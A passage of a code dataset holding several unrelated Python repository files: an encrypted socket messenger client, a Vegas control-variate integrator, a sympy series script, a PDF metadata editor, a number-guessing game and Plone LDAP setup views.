self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((HOST, PORT_R))\n self.state=REGISTER\n except ValueError:\n print(f'Cannot connect with the {HOST}:{PORT_R}, {ValueError}.')\n def __register__(self):\n if self.state==REGISTER:\n with open('keys/rs.key.pub','rb') as key_file:\n self.public_reg_serv_key=serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n self.private_key=rsa.generate_private_key(\n public_exponent=65537, key_size=4096, backend=default_backend()\n )\n self.public_key=self.private_key.public_key()\n sec_unm=self.public_reg_serv_key.encrypt(\n bytes(\n self.username,'utf-8'\n ),\n padding.OAEP(\n padding.MGF1(\n algorithm=hashes.SHA256()\n ),\n algorithm=hashes.SHA256(),\n label=None)\n )\n msg_id=bytes(protocol.REG_REQUEST)\n self.data=msg_id+sec_unm+bytes(self.public_key.public_bytes(\n encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo\n ))\n self.sock.sendto(self.data, (HOST, PORT_R))\n self.data=self.sock.recv(1024)\n un_data=self.private_key.decrypt(\n self.data,\n padding.OAEP(mgf=padding.MGF1(\n algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None))\n if un_data==protocol.REG_ACCEPTED:\n print('REGISTERED!')\n self.state=ESTABLISHED\n self.__instant_work__()\n elif un_data==protocol.REG_ERROR_OCCUPIED:\n print('REGISTER_ERROR: Username is already registered. Choose anotherone! :)')\n self.__register__()\n else:\n print('ERROR')\n return \n def __instant_work__(self):\n action_id=input('''\n Now you can choose an action:\n Start messanging (1)\n Change username (2)\n Finish today (0)\n ''')\n print('OK')\n action_id=int(action_id)\n if action_id==1:\n self.__messanging__()\n elif action_id==2:\n self.__unregister__()\n self.__register__()\n elif action_id==0:\n self.__unregister__()\n sock.close()\n print('Finished! ByeBye!')\n exit()\n\n def __messanging__(self):\n user=input('Who do you want to write to?')\n print('OK, Trying!')\n self.data=self.public_reg_serv_key.encrypt(\n protocol.GET_USR_REQUEST+bytes(user,'utf-8'),\n padding.OAEP(\n padding.MGF1(\n algorithm=hashes.SHA256()\n ),\n algorithm=hashes.SHA256(),\n label=None)\n )\n self.sock.sendto(self.data, (HOST, PORT_R))\n print(f'sent {protocol.GET_USR_REQUEST} and {self.data}')\n def __unregister__(self):\n pass\n\nclass Cryptonger(User_server,User_client):\n data, sock, private_key, public_key = None,None,None,None\n public_reg_serv_key=None\n def __init__(self):\n self.state=INITIALIZE\n print('''\n Welcome to the Save Crypto Messager!\n Enjoy!\n ''')\n self.__initialize__()\n self.__register__()\n\n \nif __name__=='__main__':\n safe_client=Cryptonger() \n \n\n\n\n\n","repo_name":"swiru95/SafeMessanger","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4403252238","text":"\"\"\"\nFile that holds the CVIntegrator class\n\"\"\"\n\nfrom copy import deepcopy\nfrom numbers import Number\nfrom re import findall\nfrom sys import getsizeof\nfrom typing import Optional, Sequence, Union\n\nimport numpy as np\nfrom numpy.random import RandomState\nfrom vegas import Integrator\n\nfrom ._types import _ftype\nfrom ._wrappers import check_attrs, timing\nfrom .functions import Function, make_func\n\n\ndef classic_integrate(\n function: _ftype,\n evals: int,\n tot_iters: int,\n bounds: Union[Sequence[tuple[float, float]], tuple[float, float]],\n cv_iters: Optional[Union[list[int], int, str]] = None,\n cv_means: Union[float, Sequence[float]] = 1,\n cname: str = None,\n name: str = None,\n **params: float,\n):\n \"\"\"\n A convenience method if you don't want to create a custom Function class via\n make_func. This method will do it for you, pass the class to the CVIntegrator and\n run the integrate method, passing back the CVIntegrator.\n\n Parameters:\n function - The function to be integrated. Must be vectorized, see the docstring for\n make_func for more info (from control_vegas import make_func).\n evals - Number of Vegas evaluations per iteration (called `neval` by Vegas). This\n is the default value used by create_maps, get_is_cv_values but those can be\n specified separately.\n tot_iters - Total number of iterations for Vegas to do (called `nitn` by Vegas).\n bounds - The bounds of the integration for each dimension given as a list of tuples.\n The CVIntegrator class uses the dimension from the Function class so that the\n bounds argument is optional. But here it is opposite, the dimension of the\n function is implied from the number of bounds.\n cv_iters - List of iterations to use as CVs. See the docstring for CVIntegrator\n for more information about the options. Most simply can be an integer\n representing a single CV or a list of integers representing multiple.\n cv_means (default 1) - The value of E[g_i] but by the scheme laid out in\n `get_is_cv_values` to obtain the control variate, E[g_i] should be approximately\n one.\n cname (default None) - The name of the class of the Function passed to CVIntegrator.\n If not specified, the __name__ attribute of `function` is passed capitalized.\n name (default None) - The name attribute of the Function. If not specified,\n the __name__ attribute is passed as is.\n params - Parameters for the function.\n \"\"\"\n # make Function object\n function = make_func(\n cname=function.__name__.capitalize() if cname is None else cname,\n dimension=len(bounds),\n function=function,\n name=function.__name__ if name is None else name,\n **params,\n )\n # Create integrator object\n cvi = CVIntegrator(\n function=function,\n evals=evals,\n tot_iters=tot_iters,\n bounds=bounds,\n cv_iters=cv_iters,\n cv_means=cv_means,\n )\n # And integrate\n cvi.integrate()\n return cvi\n\n\nclass CVIntegrator:\n \"\"\"\n Integrating a function f, we can equivalently integrate f'=f + c(g +E[g]) where the\n expectation value of g is known. Choosing the optimal value for c will necessarily\n reduce the variance. We can have an arbitrary number of g's (called control variates\n (CVs)). Here we use a previous Vegas adapted interation of f for g. So if we have a\n total of N iterations of f, then we can have a maximum of N-1 CVs.\n\n Below, f' is called self.weight_prime (or the 'CV function'), f is self.weight_value\n (or the 'adapted/IS function') and the CVs (the g_i's) are elements of the list\n self.cv_values (called CVs). These are the terminology used in the docstrings below.\n\n Explanation of parameters:\n neval - Passed on instantiation of class, check __init__ docstring for details.\n nitn - The number of iterations the Integrator is ran to get the adapted\n function.\n cv_nums - The number of control variates.\n map_neval - The number of evaluations per iteration when initially creating the\n map. Defaults to neval.\n jac_neval - The size of the Jacobian arrays, i.e. how finely split up the\n integration region is. Defaults to neval*nitn\n tot_neval - The total number of evaluations done when creating the fully adapted\n map.\n \"\"\"\n\n # Should you print out the time it takes for the main functions to run?\n TIMING = False\n # Memory threshold for when `memory=\"tiny\"`\n TINY_THRESHOLD = 100\n # Integer code for the 'auto1' option of cv_iters\n AUTO1 = [1e15]\n\n def __init__(\n self,\n function: Function,\n evals: int,\n tot_iters: int,\n bounds: Optional[Sequence[tuple[float, float]]] = None,\n cv_iters: Optional[Union[list[int], int, str]] = None,\n cv_means: Union[float, Sequence[float]] = 1,\n rng_seed: Optional[int] = None,\n memory: str = \"medium\",\n ):\n \"\"\"\n Takes in a Function class object from functions.py. One can make their own using\n the make_func function found in that file.\n\n Parameters:\n function - Function class with f to integrate.\n evals - Number of Vegas evaluations per iteration (called `neval` by Vegas).\n This is the default value used by create_maps, get_is_cv_values but those\n can be specified separately.\n tot_iters - Total number of iterations for Vegas to do (called `nitn` by Vegas).\n bounds (default None) - The bounds of the integration for each dimension. If not\n given, defaults to [0, 1] for every dimension.\n cv_iters (default None) - List of iterations to use as CVs. Defaults to no CVs.\n Can be passed as a single integer which is considered as a single control\n variate. Can also be passed as a string:\n - 'all': Use every iteration as a control variate.\n - 'all%n': Use every iteration mod n. For example, if tot_iters=10\n and cv_iters='all%2', then it uses [2, 4, 6, 8]\n - 'all%n+b': Use every iteration (shifted by b) mod n. For example, if\n tot_iters=10 and cv_iters='all%2+1', then use [1, 3, 5, 7, 9]\n - 'auto1': Will automatically assign a single CV by testing each\n possibility with a small number of events\n cv_means (default 1) - The value of E[g_i] but by the scheme laid out in\n `get_is_cv_values` to obtain the control variate, E[g_i] should be\n approximately one.\n rng_seed (default None) - The seed to use for the numpy RandomState class.\n Useful for testing with the same numbers. Note: vegas's Integrator does\n not have a seed argument and so self.create_maps must be run separately\n than with self.get_is_cv_values and self.get_weight_prime. If no seed is\n passed, a random one will be created.\n memory (default 'medium') - Either 'low', 'medium', 'large' or `max. Determines\n what is saved. If `max`, save everything. If `large, don't save self.xs\n and self.is_jac. If 'medium', additionally don't save self.weight_value and\n self.weight_prime. If 'tiny', remove everything below the threshold\n TINY_TRESHOLD.\n \"\"\"\n # Initialize private attributes for the properties\n self._init_results()\n # Ordering of timing if activated\n if self.TIMING:\n self.timing_count = 1\n\n self.function = function\n self.bounds = self.function.dim * [[0, 1]] if bounds is None else bounds\n self.neval = evals\n self.nitn = tot_iters\n\n self.cv_nitn = cv_iters\n # Create empty list if not specified, i.e. no control variates\n if self.cv_nitn is None:\n self.cv_nitn = []\n # If cv_iters is a number, put it into a list\n if isinstance(self.cv_nitn, (int, np.integer)):\n self.cv_nitn = [self.cv_nitn]\n if isinstance(self.cv_nitn, str):\n # Find the mod and shift using regex\n all_str = findall(r\"^all%(\\d+)(?:\\+(\\d+))?$\", self.cv_nitn)\n if all_str:\n # Extract those parameters (0 shift if not specified)\n mod = int(all_str[0][0])\n shift = 0 if not all_str[0][1] else int(all_str[0][1])\n # Create list according to those numbers\n shifted_cv_nitns = np.where(np.arange(self.nitn) % mod == 0)[0] + shift\n self.cv_nitn = list(shifted_cv_nitns[shifted_cv_nitns < self.nitn])\n elif self.cv_nitn == \"all\":\n self.cv_nitn = list(range(1, self.nitn))\n elif self.cv_nitn == \"auto1\":\n self.cv_nitn = self.AUTO1\n\n # Iteration 0 is no iteration at all, so remove it\n if 0 in self.cv_nitn:\n self.cv_nitn.remove(0)\n\n self.num_cvs = len(self.cv_nitn)\n self.cv_means = cv_means\n # A number implies a constant mean value\n if isinstance(self.cv_means, Number):\n self.cv_means = self.num_cvs * [cv_means]\n\n self.rng_seed = np.random.randint(0, 1e9) if rng_seed is None else rng_seed\n self.memory = memory\n\n def _init_results(self):\n \"\"\"Initializes the private attributes for the listed properties.\"\"\"\n for name, obj in self.__class__.__dict__.items():\n if isinstance(obj, property):\n self.__setattr__(f\"_{name}\", np.nan)\n\n @timing\n def create_maps(\n self, map_neval: Optional[int] = None, auto1_neval: Optional[int] = None\n ) -> None:\n \"\"\"\n Creates the maps corresponding to the adapted function, f, and the\n control variates, g_i.\n\n Parameters:\n map_neval (default None) - The number of evaluations per iteration as\n the maps are being created. Defaults to `self.neval`.\n auto1_neval (defaut None) - Only used if `cv_iters` was set to 'auto1'.\n The number of iterations to use for the testing of each CV. Defaults\n to the value of `self.map_neval`.\n \"\"\"\n self.map_neval = self.neval if map_neval is None else map_neval\n integrator = Integrator(self.bounds)\n self._cv_maps = []\n self.tot_neval = 0\n\n # Will adapt maps as usual, but then test each map as a single CV with\n # `auto1_neval` events to get an estimate of which CV is best to use\n if self.cv_nitn == self.AUTO1:\n auto1_neval = self.map_neval if auto1_neval is None else auto1_neval\n # Run for a smaller number of points for every possibility\n self._tmp_cv_maps = []\n # Copy every map iteration\n for nitn in range(self.nitn - 1):\n result = integrator(self.function._f, nitn=1, neval=self.map_neval)\n self._tmp_cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n\n result = integrator(self.function._f, nitn=1, neval=self.map_neval)\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n\n # Run through each map and see what the VRP is\n vrps = []\n for ind, cv_map in enumerate(self._tmp_cv_maps):\n self._cv_maps = [cv_map]\n\n self.get_is_cv_values(jac_neval=auto1_neval)\n self.get_weight_prime()\n vrps.append(self.vrp)\n # Find which index/map gives the maximum VRP and use that\n max_vrp_ind = np.argmax(vrps)\n self.cv_nitn = [max_vrp_ind + 1]\n self._cv_maps = [self._tmp_cv_maps[max_vrp_ind]]\n # Will adapt maps until a CV is reached and save that CV and keep going\n elif self.cv_nitn:\n # Run integrator for number of iterations until we reach first CV\n result = integrator(\n self.function._f, nitn=self.cv_nitn[0], neval=self.map_neval\n )\n # Save map for CV\n self._cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n # For loop if there is more than 1 CV to save the others\n for cv_nitn_diff in np.diff(self.cv_nitn):\n # Same process as before\n result = integrator(\n self.function._f, nitn=cv_nitn_diff, neval=self.map_neval\n )\n self._cv_maps.append(deepcopy(integrator.map))\n self.tot_neval += int(result.sum_neval)\n\n # And save the final map as the IS map\n result = integrator(\n self.function._f,\n nitn=self.nitn - self.cv_nitn[-1],\n neval=self.map_neval,\n )\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n # This option is for no CVs, so don't save any for the CV\n else:\n # Only have an IS map if there are no CVs\n result = integrator(self.function._f, nitn=self.nitn, neval=self.map_neval)\n self._is_map = deepcopy(integrator.map)\n self.tot_neval += int(result.sum_neval)\n\n @timing\n def get_is_cv_values(self, jac_neval: Optional[int] = None) -> None:\n \"\"\"\n Calculates the adapted function and the control variates from their maps.\n\n Parameters:\n jac_neval (default None) - The number of steps to split up `ys`, the unit\n hypercube, into. Defaults to `self.tot_neval`, the total number of\n iterations used when adapting the map.\n \"\"\"\n self.jac_neval = self.tot_neval if jac_neval is None else jac_neval\n rng = RandomState(seed=self.rng_seed)\n\n # Uniformly distributed unit hypercube\n ys = rng.uniform(0, 1, (self.jac_neval, self.function.dim))\n # Find the Jacobian. If by importance sampling we transform f -> f/p, then\n # the Jacobian is 1/p\n xs = np.empty(ys.shape, float)\n is_jac = np.empty(ys.shape[0], float)\n self._is_map.map(ys, xs, is_jac)\n # The IS values\n self.weight_value = is_jac * self.function._f(xs)\n\n # Find the Jacobian(s) for the CV(s)\n self.cv_values, self.cv_jacs = [], []\n for cv_map in self._cv_maps:\n # Use inverse map for control variate to find CV Jacobian\n t_inv = np.empty(xs.shape, float)\n cv_jac = np.empty(xs.shape[0], float)\n cv_map.invmap(xs, t_inv, cv_jac)\n\n self.cv_values.append(is_jac / cv_jac)\n self.cv_jacs.append(cv_jac)\n\n if self.memory == \"max\":\n self.xs = xs\n self.is_jac = is_jac\n\n @timing\n def get_weight_prime(self) -> None:\n \"\"\"\n Calculates the final CV function by finding the optimal coefficients\n for the control variates.\n \"\"\"\n self._find_coefficients()\n self.weight_prime = self.weight_value + sum(\n [\n self.cs[ind] * (self.cv_values[ind] - self.cv_means[ind])\n for ind in range(self.num_cvs)\n ]\n )\n\n def _find_coefficients(self) -> None:\n \"\"\"\n Finds the optimized values for the CV coefficients to minimize the variance via\n a matrix. Our equation to solve is of the form A=Bc where A and c are arrays and\n B is a matrix. We solve for c.\n\n The ith value of a control variate can be correlated to its coefficient, so\n removing said value when calculating the covariance would remove this\n correlation while still maintaining a good approximation of it. In effect,\n this would look like a covariance for each ith point. But this subtlety does\n not have a noticeable effect on the result but slows down the algorithm by\n multiple times so it isn't done.\n \"\"\"\n # Populate the B matrix\n Bs = np.cov(self.cv_values)\n As = np.array([-np.cov(self.weight_value, cv)[0, 1] for cv in self.cv_values])\n\n # np.cov returns 0D array if there's only one element, so turn it into a matrix\n if self.num_cvs == 1:\n Bs = Bs.reshape(1, 1)\n # Solve the system of equations\n cs = np.linalg.solve(Bs, As)\n self.cs = cs.T\n\n @timing\n def integrate(\n self,\n map_neval: Optional[int] = None,\n jac_neval: Optional[int] = None,\n auto1_neval: Optional[int] = None,\n ) -> None:\n \"\"\"\n Runs the necessary functions to integrate the function in the order:\n 1) self.create_maps\n 2) self.get_is_cv_values\n 3) self.get_weight_primes\n Check out the docstrings of these functions for more info on them.\n\n Parameters:\n map_neval (default None) - From self.create_maps docstring: The number of\n evaluations per iteration as the maps are being created. Defaults to\n `self.neval`.\n jac_neval (default None) - From self.get_is_cv_values docstring: The number of\n steps to split up `ys`, the unit hypercube, into. Defaults to\n `self.tot_neval`, the total number of iterations used when adapting the map.\n auto1_neval (defaut None) - Only used if `cv_iters` was set to 'auto1'.\n The number of iterations to use for the testing of each CV. Defaults\n to the value of `self.map_neval`.\n \"\"\"\n self.create_maps(map_neval=map_neval, auto1_neval=auto1_neval)\n self.get_is_cv_values(jac_neval=jac_neval)\n if self.cv_values:\n # only run if we are using control variates\n self.get_weight_prime()\n self.garbage_collect()\n\n @timing\n def garbage_collect(self, memory: Optional[str] = None) -> None:\n \"\"\"\n Deletes attributes depending on choices of self.memory to clear up memory.\n\n Parameters:\n memory (default None) - A measure of how many attributes to delete to clear up\n memory. Can be 'max', 'large', 'medium' or 'tiny'. More info in the class\n __init__ docstring.\n \"\"\"\n memory = memory or self.memory\n\n # Initialize properties so result is saved before deleting arrays they need\n self.stdev\n self.mean\n self.w_stdev\n self.w_mean\n\n # Large arrays not used in anything\n if memory in {\"large\", \"medium\", \"tiny\"}:\n self._delete(\"xs\", \"is_jac\")\n # Large arrays but used in properties below\n if memory in {\"medium\", \"tiny\"}:\n self._delete(\"weight_prime\", \"weight_value\")\n # All bigger than a certain threshold\n if memory == \"tiny\":\n attr_items = list(self.__dict__.items())\n for attr, attr_val in attr_items:\n if getsizeof(attr_val) > self.TINY_THRESHOLD:\n self.__delattr__(attr)\n\n def _delete(self, *attrs):\n \"\"\"Delete attribute if it still exists as one.\"\"\"\n for attr in attrs:\n if attr in self.__dir__():\n self.__delattr__(attr)\n\n @property\n @check_attrs(\"weight_prime\", \"jac_neval\")\n def stdev(self) -> float:\n \"\"\"Standard deviation of CV function\"\"\"\n self._stdev = np.std(self.weight_prime) / np.sqrt(self.jac_neval)\n return self._stdev\n\n @property\n @check_attrs(\"weight_value\", \"jac_neval\")\n def w_stdev(self) -> float:\n \"\"\"Standard deviation of IS function\"\"\"\n self._w_stdev = np.std(self.weight_value) / np.sqrt(self.jac_neval)\n return self._w_stdev\n\n @property\n @check_attrs(\"stdev\")\n def var(self) -> float:\n \"\"\"Variance of CV function\"\"\"\n self._var = self.stdev**2\n return self._var\n\n @property\n def w_var(self) -> float:\n \"\"\"Variance of IS function\"\"\"\n self._w_var = self.w_stdev**2\n return self._w_var\n\n @property\n @check_attrs(\"weight_prime\")\n def mean(self) -> float:\n \"\"\"Mean of CV function\"\"\"\n self._mean = np.mean(self.weight_prime)\n return self._mean\n\n @property\n @check_attrs(\"weight_value\")\n def w_mean(self) -> float:\n \"\"\"Mean of IS function\"\"\"\n self._w_mean = np.mean(self.weight_value)\n return self._w_mean\n\n @property\n def vrp(self) -> float:\n \"\"\"\n Variance reduction in percentage, i.e. by what percent was the variance\n reduced due to the CVs.\n \"\"\"\n self._vrp = 1 - self.var / self.w_var\n return self._vrp\n\n def compare(\n self, rounding: int = 3, cutoff: Union[int, tuple[int, int]] = 3\n ) -> None:\n \"\"\"\n Print out mean, variance and standard deviation for without and with the CVs.\n\n Parameters:\n rounding - How many digits to round the numbers to.\n cutoff - The power (base 10) at which to switch from floating point to\n scientific notation. That is if `cutoff=3`, then any value that is less than\n 10^-3 or greater than 10^-3 will be printed in scientific notation. Can also\n be given as a tuple representing the lower and upper bound separately. So if\n `cutoff=(-3, 5)`, then the value would be printed in scientific notation if\n it is less than 10^-3 or greater than 10^5.\n \"\"\"\n if isinstance(cutoff, int):\n neg_co, pos_co = 10 ** (-cutoff), 10**cutoff\n else:\n neg_co, pos_co = 10 ** (-cutoff[0]), 10 ** cutoff[1]\n\n def vtype(val):\n \"\"\"Returns 'e' for scientific method or 'f' for float\"\"\"\n if np.isnan(val) or (val > neg_co and val < pos_co):\n return \"f\"\n return \"e\"\n\n w_mean = f\"{self.w_mean:.{rounding}{vtype(self.w_mean)}}\"\n w_var = f\"{self.w_var:.{rounding}{vtype(self.w_var)}}\"\n w_stdev = f\"{self.w_stdev:.{rounding}{vtype(self.w_stdev)}}\"\n mean = f\"{self.mean:.{rounding}{vtype(self.mean)}}\"\n var = f\"{self.var:.{rounding}{vtype(self.var)}}\"\n stdev = f\"{self.stdev:.{rounding}{vtype(self.stdev)}}\"\n vrp = f\"{100 * self.vrp:.{rounding}{vtype(100 * self.vrp)}}%\"\n\n plural = \"s\" if len(self.cv_nitn) > 1 else \"\"\n titles = f\"No CV{plural}\", f\"With CV{plural}\"\n print(f\"{9*' '}|{titles[0]:^{8 + rounding}}|{titles[1]:^{8 + rounding}}\")\n print(f\"---------+{'-'*(8 + rounding)}+{'-'*(8 + rounding)}\")\n print(f\"Mean |{w_mean:>{7 + rounding}} |{mean:>{7 + rounding}}\")\n print(f\"Variance |{w_var:>{7 + rounding}} |{var:>{7 + rounding}}\")\n print(f\"St Dev |{w_stdev:>{7 + rounding}} |{stdev:>{7 + rounding}}\")\n print(f\"VRP |{' ' * (7 + rounding)} |{vrp:>{7 + rounding}}\")\n","repo_name":"crumpstrr33/covvvr","sub_path":"src/covvvr/cvintegrator.py","file_name":"cvintegrator.py","file_ext":"py","file_size_in_byte":22794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37921580200","text":"# ASSIGNMENT NAME: HW 8\n# NAME: Chance Cardona \n# EMAIL: ccardona@mymail.mines.edu \n# DATE: 12/2/18\n# DESCRIPTION: Sympy proof from Problem 3 of HW 8.\n# OTHER NOTES:\n\nfrom sympy import Symbol, cos, series, exp, diff\n\nx = Symbol('x')\n\ndef func(x):\n return -1/(1 - exp(-x))\n\ndef main(k, terms):\n d = diff(func(x), x, k)\n print(d)\n a = series(d, x, n=terms)\n print(\"The derivative of the order {} with first {} terms in the Taylor series is \\n{}\".format(k, terms, a))\n\n return a\n\nnum = 3\norder = 3\nmain(order, num)\n","repo_name":"chancecardona/MathPhysics","sub_path":"SymbolicMath/zetaSymbolicExpander.py","file_name":"zetaSymbolicExpander.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41930202062","text":"from typing import Dict\nfrom pypdf import PdfReader, PdfWriter, DocumentInformation\n\nclass PDFMetadata(object):\n def __init__(self, metadata: Dict[str, str], originalPDF: str = \"\", modifiedPDF: str = \"\", \n keepOriginalMetadata: bool = True) -> None:\n self.metadata: Dict[str, str] = metadata\n self.modifiedPDF: str = modifiedPDF\n self.keepOriginalMetadata: bool = keepOriginalMetadata\n\n try:\n self.pdfFileReader = PdfReader(originalPDF)\n except Exception as e:\n raise Exception(\"ERROR READING PDF FILE :: %s\" % (originalPDF))\n \n try:\n self.pdfFileWriter = PdfWriter()\n except Exception as e:\n raise Exception(\"ERROR CREATING PDF WRITER :: %s\" % (e))\n \n\n def write(self):\n try:\n metadata = {}\n if self.keepOriginalMetadata:\n metadata = {**dict(self.read()), **self.metadata}\n else:\n metadata = self.metadata\n\n # region Adding pages to the writer\n for page in self.pdfFileReader.pages:\n self.pdfFileWriter.add_page(page)\n # endregion\n\n # region Writing Final PDF\n self.pdfFileWriter.add_metadata(metadata)\n with open(self.modifiedPDF, \"wb\") as file:\n self.pdfFileWriter.write(file)\n # endregion\n except Exception as e:\n raise Exception(\"ERROR WRITING METADATA TO FILE :: %s\" % str(e))\n\n def read(self) -> DocumentInformation:\n try:\n return self.pdfFileReader.metadata\n except Exception as e:\n raise Exception(\"ERROR READING METADATA FROM FILE :: %s\" % str(e))","repo_name":"abaker2010/pdf-editor","sub_path":"src/pdf_parts/pdf_metadata.py","file_name":"pdf_metadata.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6616218312","text":"# coding: utf-8\ndef game_core_v2(number):\n '''Реализуем алгоритм бинарного поиска\n Функция принимает загаданное число и возвращает число попыток'''\n count = 1\n low_limit = 1\n high_limit = 100\n predict = (low_limit + high_limit)//2 #Вычисляем предполагаемое число\n while number != predict:\n count+=1\n if number > predict: #Если загаданное число больше преполагаемого\n low_limit = predict + 1 #Вычисляем новую границу диапазона поиска\n predict = (low_limit + high_limit)//2\n elif number < predict: #Если загаданное число меньше преполагаемого\n high_limit = predict - 1 #Вычисляем новую границу диапазона поиска\n predict = (low_limit + high_limit)//2\n return(count) # выход из цикла, если угадали\n\n\nimport numpy as np\ndef score_game(game_core):\n '''Запускаем игру 1000 раз, чтобы узнать, как быстро игра угадывает число'''\n count_ls = []\n np.random.seed(1) # фиксируем RANDOM SEED, чтобы наш эксперимент был воспроизводим!\n random_array = np.random.randint(1,101, size=(1000))\n for number in random_array:\n count_ls.append(game_core(number))\n score = int(np.mean(count_ls))\n print(f\"Ваш алгоритм угадывает число в среднем за {score} попыток\")\n return(score)\n\n# запускаем\nscore_game(game_core_v2)\n","repo_name":"serhiymorozov/DEV","sub_path":"module_0/project_0.py","file_name":"project_0.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36056775447","text":"from five import grok\nfrom zope.interface import Interface\nfrom zope.interface import alsoProvides\nfrom zope.component.hooks import getSite\n\nfrom Products.CMFPlone.interfaces import IPloneSiteRoot\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.PluggableAuthService.interfaces.plugins import IUserAdderPlugin\nfrom Products.PlonePAS.interfaces.group import IGroupManagement\n\nfrom plone import api\n\nfrom genweb.core.interfaces import IHomePage\n\nimport pkg_resources\nimport logging\n\ntry:\n pkg_resources.get_distribution('Products.PloneLDAP')\nexcept pkg_resources.DistributionNotFound:\n HAS_LDAP = False\nelse:\n HAS_LDAP = True\n from Products.PloneLDAP.factory import manage_addPloneLDAPMultiPlugin\n from Products.LDAPUserFolder.LDAPUserFolder import LDAPUserFolder\n\ntry:\n pkg_resources.get_distribution('plone.app.contenttypes')\nexcept pkg_resources.DistributionNotFound:\n HAS_DXCT = False\nelse:\n HAS_DXCT = True\n from plone.dexterity.utils import createContentInContainer\n\n\nlogger = logging.getLogger(__name__)\n\nimport os\n\nLDAP_PASSWORD = os.environ.get('ldapbindpasswd', '')\n\n\nclass setupDX(grok.View):\n \"\"\" Setup View that fixes p.a.ct front-page\n \"\"\"\n grok.name('setupdxctsite')\n grok.context(Interface)\n grok.require('cmf.ManagePortal')\n\n def render(self):\n if HAS_DXCT:\n portal = getSite()\n pl = getToolByName(portal, 'portal_languages')\n if getattr(portal, 'front-page', False):\n portal.manage_delObjects('front-page')\n frontpage = createContentInContainer(portal, 'Document', title=u\"front-page\", checkConstraints=False)\n alsoProvides(frontpage, IHomePage)\n frontpage.exclude_from_nav = True\n frontpage.language = pl.getDefaultLanguage()\n frontpage.reindexObject()\n # Set the default page to the homepage view\n portal.setDefaultPage('homepage')\n return self.request.response.redirect(portal.absolute_url())\n else:\n return 'This site has no p.a.contenttypes installed.'\n\n\nclass setupLDAPUPC(grok.View):\n \"\"\" Configure LDAPUPC for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n\n if HAS_LDAP:\n try:\n manage_addPloneLDAPMultiPlugin(portal.acl_users, 'ldapUPC',\n title='ldapUPC', use_ssl=1, login_attr='cn', uid_attr='cn', local_groups=0,\n users_base='ou=Users,dc=upc,dc=edu', users_scope=2,\n roles='Authenticated', groups_base='ou=Groups,dc=upc,dc=edu',\n groups_scope=2, read_only=True, binduid='cn=ldap.serveis,ou=users,dc=upc,dc=edu', bindpwd=LDAP_PASSWORD,\n rdn_attr='cn', LDAP_server='ldap.upc.edu', encryption='SSHA')\n portal.acl_users.ldapUPC.acl_users.manage_edit('ldapUPC', 'cn', 'cn', 'ou=Users,dc=upc,dc=edu', 2, 'Authenticated',\n 'ou=Groups,dc=upc,dc=edu', 2, 'cn=ldap.serveis,ou=users,dc=upc,dc=edu', LDAP_PASSWORD, 1, 'cn',\n 'top,person', 0, 0, 'SSHA', 1, '')\n plugin = portal.acl_users['ldapUPC']\n\n plugin.manage_activateInterfaces(['IGroupEnumerationPlugin', 'IGroupsPlugin', 'IGroupIntrospection', 'IAuthenticationPlugin', 'IUserEnumerationPlugin'])\n # Comentem la linia per a que no afegeixi\n # LDAPUserFolder.manage_addServer(portal.acl_users.ldapUPC.acl_users, 'ldap.upc.edu', '636', use_ssl=1)\n\n LDAPUserFolder.manage_deleteLDAPSchemaItems(portal.acl_users.ldapUPC.acl_users, ldap_names=['sn'], REQUEST=None)\n LDAPUserFolder.manage_addLDAPSchemaItem(portal.acl_users.ldapUPC.acl_users, ldap_name='sn', friendly_name='Last Name', public_name='name')\n\n # Move the ldapUPC to the top of the active plugins.\n # Otherwise member.getProperty('email') won't work properly.\n # from Products.PluggableAuthService.interfaces.plugins import IPropertiesPlugin\n # portal.acl_users.plugins.movePluginsUp(IPropertiesPlugin, ['ldapUPC'])\n # portal.acl_users.plugins.manage_movePluginsUp('IPropertiesPlugin', ['ldapUPC'], context.REQUEST.RESPONSE)\n\n except:\n logger.debug('Something bad happened and the LDAP has not been created properly')\n\n try:\n plugin = portal.acl_users['ldapUPC']\n plugin.ZCacheable_setManagerId('RAMCache')\n\n portal_role_manager = portal.acl_users['portal_role_manager']\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPC.Plone.Admins')\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPCnet.Plone.Admins')\n portal_role_manager.assignRolesToPrincipal(['Manager'], 'UPCnet.ATIC')\n\n except:\n logger.debug('Something bad happened and the LDAP has not been configured properly')\n\n else:\n logger.debug('You do not have LDAP libraries in your current buildout configuration. POSOK.')\n\n # try:\n # Fora el sistema de cookies que fan buscar al LDAP cn=*\n # portal.acl_users.manage_delObjects('credentials_cookie_auth')\n # except:\n # pass\n\n\nclass setupLDAPExterns(grok.View):\n \"\"\" Configure LDAPExterns for Plone instance \"\"\"\n grok.context(IPloneSiteRoot)\n grok.require('zope2.ViewManagementScreens')\n\n def render(self):\n portal = getSite()\n\n # Delete the LDAPUPC if exists\n if getattr(portal.acl_users, 'ldapUPC', None):\n portal.acl_users.manage_delObjects('ldapUPC')\n\n # try:\n manage_addPloneLDAPMultiPlugin(portal.acl_users, 'ldapexterns',\n title='ldapexterns', use_ssl=1, login_attr='cn', uid_attr='cn', 